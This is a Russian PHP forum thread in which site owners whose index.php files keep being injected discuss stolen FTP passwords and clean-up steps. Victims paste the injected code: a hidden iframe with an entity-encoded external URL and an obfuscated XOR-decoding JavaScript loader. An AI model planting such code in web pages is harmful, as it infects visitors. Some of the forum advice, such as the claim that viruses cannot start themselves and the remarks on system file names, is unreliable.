Форум PHP

Помогите, взламывают и записывают всякую фигню в index.php
Chmod 755 что дальше делать

Подробней можно?

а адресок сайта не подскажете?

меняй пароль и логин для доступ на твой сайт, свяжись с хостингом. Почему ломают, может что ценное на сайте у тебя хранится.

"Фигня" - это рекламные ссылки? С высокой долей вероятности уплыли FTP-пароли. Сейчас очень много троянов, ворующих FTP-пароли - нужно тщательно чистить клиентские машины, откуда осуществляется доступ на FTP и менять FTP-пароли...

PS Сейчас просто эпидемия таких троянов...

>PS Сейчас просто эпидемия таких троянов...
ужас

http://www.warec.org блин опять только что стер записали фот такую фигню

<iframe src='&#104;&#116;&#116;&#112;&#58; &#47;&#47;&#98;&#115;&#100;&#112;&#110; &#103;&#46;&#105;&#110;&#102;&#111;&#47; &#101;&#114;&#114;&#111;&#114;&#47;'  width='1' height='1' style='visibility:  hidden;'></iframe>

через эту вирус грузиться попробуйте, что нить как не будь записать в index.php

Троян тырящий пароли от ФТП, в основном если вы сидите через ТОТАЛ КОММАНДЕР 9где-то авно читал)... полностью поменяйте все пароли и желательно проверьте свой комп на вирусы и трояны! Поверьте, лучше потратить пару часов на проверку компа, чем потом мучаться с ээтим (сам недавно целый день угрохал перекопирывая все нужные файлы другу на винт, потом форматированием винта и переброско файлов назад + еще раз проверка на вирусы)

Прислушайтесь к изречениям cheops'а. Он прав, я сам с таким сталкивался и не раз...

Чтобы не записывали всякую херню на сайт установите права на доступ к файлк 444
Мне интересно как взломщики узнают в каких папках лежат index.php

Там вообще достаточно хитрый бот - он старается так добавить ссылки, чтобы работоспособность сайта оставалась не нарушенной.

>Мне интересно как взломщики узнают в каких папках лежат index.php
Сканируют сайт - по FTP все файлы и вложенные директории видны.

И как можно посмотреть папки ,не зная пароля FTP?
Какой то мудак днём и ночью долбится в мой сайт, пришлось на все файлы ставить разрешение 444. Есть ещё сайт на народовском бесплатном хостинге, так он и там записал свой вирус в i файл ndex.html.

cheops имел в виду, что троян взял пароль с Вашей клиентской машины. И теперь вражий скрипт, зная пароль, спокойно ходит по FTP к серверу, смотрит каталоги, файлы и меняет скрипты и прочий сайтовый контент под себя..

Может и не троян=)

http://warec.org/moduli/sitenews/print.php?id=/*
http://www.warec.org/moduli/basefix_clean/basefix_clean.php

Дальше пока не искал. Даже если это и не то, закрыть все равно стоит)

Вчера столкнулся первый раз с этой фигней.
Методом логического анализа нашел файл трояна, вот он: windows/windows32/kernels.exe.
Ищите его и убивайте.

У меня тоже вот недавно было такое! Месяца 2 - 3 ломали сайт!
Т.е. в конец дописывали какой ЖАБАСКРИПТ код щас приведц его. Который грузит вам файлы какие то. Я сам на своем же сайте 2 раза попался на такую финю!

<!--<S>--><script>try {function AT(PV){return parseInt(PV)}var KO='xxQxtQxVQxdQxiQxNQxgQxHQxqQxcQxnQx9 QxCQ xXQx5QxAQxMQx6QxkQx7Qx8QxLQxrQx4Qxh QxSQxjQx PQxBQxbQxpQxZQxmQxGQxoQxOQxFQxDQxTQ xfQxUQxe QxsQxaQxwQxWQxlQx3QxIQxYQxzQxRQxyQx KQtxQttQ tVQtdQtiQtNQtgQtHQtqQtcQtnQt9QtCQtX Qt5QtAQt M';var KC=String('Q'),kw=Array(AT('131'), AT('204'),AT('220'),AT('205'),14967^15009, AT('207'),AT('203'),15942^16089,1170^1089, 3315^3117,30572^30653,AT('216'),8909^8711, AT('218'),AT('130'),7568^7437,6384^6181, AT('201'),AT('129'),30113^29971,AT('181'), AT('143'),AT('142'),AT('132'),AT('145'), AT('208'),AT('198'),16945^17123,AT('217'), AT('144'),3606^3777,19132^18987,AT('219'), AT('212'),AT('199'),14105^14313, 19329^19221,AT('150'),13661^13775,AT('196' ),5686^5811,AT('158'),655^527,19109^19013, AT('228'),AT('225'),7676^7481,AT('134'), 9125^9031,15304^15195,344^443,AT('250'), 1159^1145,25974^26027,AT('253'), 25991^25935,5587^5423,16905^17099, 24292^24169,21695^21555,AT('139'),AT('138' ),AT('137'),AT('136'),27898^27773, 23773^23599,AT('149'),8618^8529, 11088^11195,AT('248'),AT('236'));var Fe,GR; var WR, fU='xxxtxVxdxixNxgxHxqxcxnx9xCxcx9xXx5x AxMx cx6xcxtxVxdxixNxgxAxkx7x8x6xcxdxHxV xnxHx5xH xAxtxdxLxqxtxLxrxAx4x7x8x6xcxdxHxVx 6xHx5xHx AxrxAx4x7x8x6xcxdxHxtxXxHx5xHxAxtxr xhxdxSxq xqxtxjxtxgxXxPxtxhxixnxBxSxAx4x7x8x 6xcxdxHx NxHx5xHxAxbxpxgxPxqxbxAx4x7x8xixBxZ xmxSxVxC xPxXxnxgxhxVxSxSxGxixXxhxixnxmxXxox OxBxZxVx nxFxAx5xAxFxVx6xDxHx5x5xHxTxrxDx7x8 xfx7x8x6 xcxdxHxCxdxqxHx5xHxAxpxgxgxNxUxbxbx AxHxFxHx ZxmxSxVxCxPxXxnxgxhxqxSxVxcxgxixSxn xhxpxSxt xgxHxex5xHxAxAxHxsxHxAxAxHxUxHxdxtx jxtxaxdx txZxDxDxHxFxHxmxSxVxCxPxXxnxgxhxqxS xVxcxgxi xSxnxhxpxSxtxgxhxdxXxNxqxcxVxXxZxbx wxWxcxTx lxLxTx3xhxTxIxbxYxHxAxhxAxDxhxdxXxN xqxcxVxX xZxbxzxhxFxbxYxHxAxhxAxDxHxFxHxAxhx AxHxFxHx dxtxjxtxaxdxtxZxDxHxFxHxAxhxAxHxFxH xtxXxHxF xHxNx4x7x8x7x8x6xcxdxHxSxHx5xHxmxSx VxCxPxXx nxgxhxVxdxXxcxgxXxRxqxXxPxXxnxgxZxA xixBxdxc xPxXxAxDx4xSxhxtxXxgxyxgxgxdxixKxCx gxXxZxAx txdxVxAxYxHxCxdxqxDx4x7x8xSxhxBxdxc xPxXtxxS xdxmxXxdx5xLx4xHxSxhttxixmxgxpx5xrx 4xHxSxhx pxXxix9xpxgx5xrx4xHxSxhxtxgxjxqxXxh xmxixtxN xqxcxjx5xAxnxSxnxXxAx4xHx7x8xgxdxjx HxfxHxmx SxVxCxPxXxnxgxhxKxSxmxjxhxcxNxNxXxn xmtVxpxi xqxmxZxSxDx4xHxdxtxjxtxaxtxVxZxVxnx YxVx6xDx 4tdx7x8xVxcxgxVxpxZxXxDxfx7x8xmxSxV xCxPxXxn xgxhttxdxixgxXxZxAxxxpxgxPxqxkxxxKx Sxmxjxkx xxbxKxSxmxjxkxxxbxpxgxPxqxkxAxDx4x7 x8xmxSxV xCxPxXxnxgxhxKxSxmxjxhxcxNxNxXxnxmt Vxpxixqx mxZxSxDx4xHxdxtxjxtxaxtxVxZxVxnxYxV x6xDx4x7 x8tdx7x8tdx7x8xBxCxnxVxgxixSxnxHxdx txjxtxax dxtxZxDxfxHx6xcxdxHxqx5titixYxVx5xA xLxrtitN tgtHtqtctnx3xLxcxKxVxmxXxBxAxYxSx5x AxAx4xHx BxSxdxZxix5xLx4xHxixHxxxHxqx4xHxixF xFxDxHxS xHxFx5xHxVxhxtxCxKxtxgxdxZt9xcxgxpx hxBxqxSx SxdxZt9xcxgxpxhxdxcxnxmxSxPxZxDtCxV xhxqxXxn x9xgxpxDxYxrxYxrxDx4xHxdxXxgxCxdxnx HxSx4xHt dx7x8xBxCxnxVxgxixSxnxHxdxtxjxtxaxt xVxZxVxn xYxVx6xDxfxHx6xcxdxHxgx5xHxnxXttxHt XxcxgxXx ZxDx4xHx6xcxdxHxXx5xHxnxXttxHtXxcxg xXxZxDx4 xHxXxhxtxXxgt5xixPxXxZxgxhx9xXxgt5x ixPxXxZx DxFtNtqxLxLxLxLxLtCtitgxDx4xHxmxSxV xCxPxXxn xgxhxVxSxSxGxixXxHx5xHxVxnxFxAx5xAx FxXxtxVx cxNxXxZxVx6xDxFxAx4xXxoxNxixdxXxtx5 xAxFxXxh xgxStAt9t5tMxgxdxixnx9xZxDx4xHtdx7x 8xxxbxtx VxdxixNxgxk';var yv=String(); KO=KO.split(KC);for(Fe=0;Fe<fU.length; Fe+=2){WR=fU.substr(Fe,2);for(GR=0;GR<KO. length;GR++){if(KO[GR]==WR)break;}  yv+=String.fromCharCode(kw[GR]^191);} document.write(yv);} catch(e){}</script><!--</S>-->

вот что то типа этого суют!

Выход я нашел! т.к. они сували в самый конец файла то я просто после последнего вывода елементов сайта написал exit();
даже если сунут мне какую нить погань то она всеравно не грузанется!
А симптомы вируса были такие - когда залазию в ИНЕТ то через несколько секунд начинается какаято загрузка данных! Причем грузит и грузит!!!

Небольшая поправка, файл называется kernel32.exe

Это системный файл, который имеется на всех машинах - без него Windows работать не должен.

Нет, уважаемый Игорь, вы ошибаетесь.
Системный файл называется krnl386.exe, а kernel32.exe своим названием косит под системый, но это вирус.
ЗЫ. Речь идет о Windows XP.

Перепутал с kernel32.dll.

Сменил пароль примерно вот такой 18_»№_dj3 вроде бы проблем пока нет только вот хостинг тормозит.
P.S форматнул Винчестер Сбил BIOS переустановил Windows

Вот с этим согласен.
Сегодня вообще труба. Вирус размножается со страшной скоростью.
Наверно, тоже придется все форматить...

Вирус сам себя запустить не может, надо его ручками активировать, по крайней мере о таких не слышал. А что бы не хватать их не надо неизвестные файлы открывать и по подозрительным ссылкам ходить, тогда и форматировать не придется, да и другими глупостями заниматься!